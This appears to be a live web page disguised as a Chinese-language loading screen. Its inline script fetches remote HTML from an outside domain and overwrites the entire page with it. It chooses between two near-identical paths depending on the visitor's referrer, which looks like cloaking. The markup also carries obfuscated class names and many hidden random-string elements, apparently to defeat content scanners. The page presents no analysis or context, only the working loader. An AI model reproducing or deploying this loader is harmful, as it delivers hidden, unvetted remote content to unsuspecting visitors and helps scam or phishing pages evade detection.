<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .LM3ZfMbY {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .LM3ZfMbY .Bkc6cEEJ {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .LM3ZfMbY .content {
            line-height: 50px;
            text-align: center
        }

        .LM3ZfMbY .img {
            width: 100%
        }

        .LM3ZfMbY .ANzYogmG3 {
            text-align: center
        }

        .LM3ZfMbY .ANzYogmG3 span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .LM3ZfMbY .ANzYogmG3 span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .LM3ZfMbY .ANzYogmG3 span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .LM3ZfMbY .ANzYogmG3 span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .LM3ZfMbY .ANzYogmG3 span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .LM3ZfMbY .ANzYogmG3 span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .LM3ZfMbY .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function Rkq31w1cfO(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var lxORA = Rkq31w1cfO('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ lxORA +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ lxORA +".html?a=share";
		}
		
        o9WbYzx=url+"#"+new Date().getTime();
        o9WbYzx && function() {
            $.get(o9WbYzx, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<img  src='' style='display:none'>
<img  src='' style='display:none'>
<p  style='display:none'>cZN1lNes0xrgH8HmuZeVAU2Fge8Fk7pgTqpS</p>
<b style='display:none' >M37yF27I41rrE5diTNGjvId059D1lo4rg9Vfeuo7XNr7YRiu1h83ny</b>
<b style='display:none' >M37yF27I41rrE5diTNGjvId059D1lo4rg9Vfeuo7XNr7YRiu1h83ny</b>
<span style='display:none'>EYkvMJeCilScPP2KBwpl7MtUcUMMr3zTnelhY</span>
<b style='display:none' >M37yF27I41rrE5diTNGjvId059D1lo4rg9Vfeuo7XNr7YRiu1h83ny</b>
<b style='display:none' >M37yF27I41rrE5diTNGjvId059D1lo4rg9Vfeuo7XNr7YRiu1h83ny</b>
<ul style='display:none' >P2aIqSHLP2aCWRnLqNg0iSGvR</ul>
<p  style='display:none'>cZN1lNes0xrgH8HmuZeVAU2Fge8Fk7pgTqpS</p><div class="LM3ZfMbY">
    <div class="Bkc6cEEJ">
        <div class="ANzYogmG3">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<b style='display:none' >VWLKNv2YoD6gImxI4AAa713lKCDi8MwxDui0YLq9yFGvM1cW</b>
<span style='display:none'>SFXE6Bm8PQXrxy0xHZdcnDgq4ip7FUEpPJ1KXedKjUvEndjzJixYt7wtzpaZy1</span>
<p  style='display:none'>HklO0AHGM5fmpg3MwU4iCtJqa9FbTYWreiIHpfrKg</p>
<a  href='#' style='display:none'>M3PUoZ0965hKdzttUfTJYWm9cf2Wa00FyL5gSQp0An6loXTdV34Vkoe8370VZBpRd6IdOinNM4Cuw0DKtekpOT</a>
<ul style='display:none' >L27A7eHiv4GwniL0eU2WOWyPuoJKN3yXSFb9Ze0Pejk7177S4imj9HIPn09rPf8ndPP5</ul>
<p  style='display:none'>HklO0AHGM5fmpg3MwU4iCtJqa9FbTYWreiIHpfrKg</p>
<b style='display:none' >VWLKNv2YoD6gImxI4AAa713lKCDi8MwxDui0YLq9yFGvM1cW</b>
<h1 style='display:none' >AlEW2I1sm4UIGzE7kuFzn4YDGGwoLaop2157WN3ckSwegeO9OlSZIauOkDNTcJrwuTzJyWmJL2v</h1>
<b style='display:none' >VWLKNv2YoD6gImxI4AAa713lKCDi8MwxDui0YLq9yFGvM1cW</b></body>
</html>